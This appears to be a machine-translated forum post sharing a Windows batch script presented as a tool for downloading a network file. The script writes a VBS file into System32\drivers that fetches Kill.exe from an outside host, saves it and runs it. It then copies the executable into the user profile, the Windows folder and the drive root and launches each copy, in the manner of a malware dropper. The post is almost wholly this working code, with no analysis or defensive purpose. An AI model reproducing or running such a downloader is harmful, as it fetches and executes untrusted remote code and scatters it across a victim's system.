This article is a mirror article of machine translation, please click here to jump to the original article.

View: 10095|Reply: 0

Download the batch source code for the specified network file

[Copy link]
Posted on 1/18/2016 12:35:04 PM | | |
  1. @echo off
  2. echo On Error Resume Next >%systemroot%\System32\drivers\Kill.vbs
  3. echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>%systemroot%\System32\drivers\Kill.vbs
  4. echo xPost.Open "GET","http://www.wwwbug.com/Down/Kill.exe",0 >>%systemroot%\System32\drivers\Kill.vbs
  5. echo xPost.Send() >>%systemroot%\System32\drivers\Kill.vbs
  6. echo Set sGet = CreateObject("ADODB.Stream") >>%systemroot%\System32\drivers\Kill.vbs
  7. echo sGet.Mode = 3 >>%systemroot%\System32\drivers\Kill.vbs
  8. echo sGet.Type = 1 >>%systemroot%\System32\drivers\Kill.vbs
  9. echo sGet.Open() >>%systemroot%\System32\drivers\Kill.vbs
  10. echo sGet.Write(xPost.responseBody) >>%systemroot%\System32\drivers\Kill.vbs
  11. echo sGet.SaveToFile "%systemdrive%\PROGRAM FILES\Kill.exe",2 >>%systemroot%\System32\drivers\Kill.vbs
  12. echo CreateObject ("Wscrip{过滤}t.shell").run "%systemdrive%\PROGRAM FILES\Kill.exe" >>%systemroot%\System32\drivers\Kill.vbs
  13. start %systemroot%\System32\drivers\Kill.vbs
  14. xcopy "%systemdrive%\PROGRAM FILES\Kill.exe" "%USERPROFILE%" /C /I /G /H /R /Y
  15. xcopy "%systemdrive%\PROGRAM FILES\Kill.exe" "%systemroot%" /C /I /G /H /R /Y
  16. xcopy "%systemdrive%\PROGRAM FILES\Kill.exe" "%SYSTEMDRIVE%" /C /I /G /H /R /Y
  17. start "%SYSTEMDRIVE%\Kill.exe"
  18. start "%systemroot%\Kill.exe"
  19. start "%USERPROFILE%\Kill.exe"
  20. pause
Copy code






Previous:Front-end library: JS page loading progress bar
Next:SQL statement to get the date part or time part of the datetime
Disclaimer:
All software, programming materials or articles published by Code Farmer Network are only for learning and research purposes; The above content shall not be used for commercial or illegal purposes, otherwise, users shall bear all consequences. The information on this site comes from the Internet, and copyright disputes have nothing to do with this site. You must completely delete the above content from your computer within 24 hours of downloading. If you like the program, please support genuine software, purchase registration, and get better genuine services. If there is any infringement, please contact us by email.

Mail To:help@itsvse.com